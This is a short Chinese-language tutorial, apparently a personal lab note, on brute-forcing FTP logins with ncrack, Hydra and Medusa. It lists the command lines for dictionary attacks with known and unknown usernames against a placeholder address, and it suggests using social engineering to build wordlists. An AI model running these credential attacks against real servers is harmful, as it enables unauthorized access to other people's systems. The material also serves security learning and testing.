ftp密码破解
——ncrack、Hydra、medusa
下面和大家分享三个kali linux中的密码破解工具(ncrack,hydra、medusa),本文主要介绍一下一些关于ftp破解过程中的简单的命令。
首先,我们可以通过直接在终端用ncrack得到ncrack版本以及相关命令的解释,如图
直接上手操作,在我们不知道用户名以及密码的情况下爆破:
我们需要用字典生成工具生成一个字典,放在桌面上备用。
命令:ncrack –U /root/桌面/pass.txt –P /root/桌面/pass.txt ftp://000.000.000.000
解释:-U为用户名,后面的/root/桌面/pass.txt 为爆破字典所在位置,同样-P为密码,后面的/root/桌面/pass.txt 也为爆破字典所在位置。只要你的字典足够强大,那么就是时间问题了。在组成字典的时候,要综合运用社工等方法形成一套适合的字典。ftp后面的000.000.000.000为ftp的地址,根据自己实际情况来改动。
在我们,知道用户名的情况下爆破:
ncrack --user 用户名 -P /root/桌面/pass.txt ftp://000.000.000.000
解释同上,但要注意--user是两道杠,并且user是小写,kali linux大小写敏感。
用Hydra再来进行一遍一样的实验:
在不知用户名以及密码的情况下,采用自己生成的密码爆破:
命令:hydra ftp://000.000.000.000 -L /root/桌面/pass.txt -P /root/桌面/pass.txt
在已知用户名的情况下爆破:
命令:hydra ftp://000.000.000.000 -l 用户名 -P /root/桌面/pass.txt
注意大小写,小写的l,大写的P
最后,来介绍一下medusa的操作方法
操作命令:
medusa
-h target (ftp的地址)
-H many targets
-u 已知用户名
-U 用户名的字典文件
-p 已知密码
-P 密码的字典
-M 模式 ftp http telnet ssh
实战命令:
已知用户名爆破密码:
medusa -h 000.000.000.000 -u 用户名 –P /root/桌面/pass.txt -M ftp
未知用户名爆破密码:
medusa -h 000.000.000.000 -U /root/桌面/pass.txt –P /root/桌面/pass.txt -M ftp
个人来说,比较喜欢hydra的界面,用户名和密码都能很清晰的显示出来。好了,至此两个工具的实验介绍就告一段落了,能力有限,只是写出了爆破时所需要的命令以及实验过程,作为自己的实验记录,欢迎各路大牛指正。本文仅用于学习交流,请勿用于违法操作。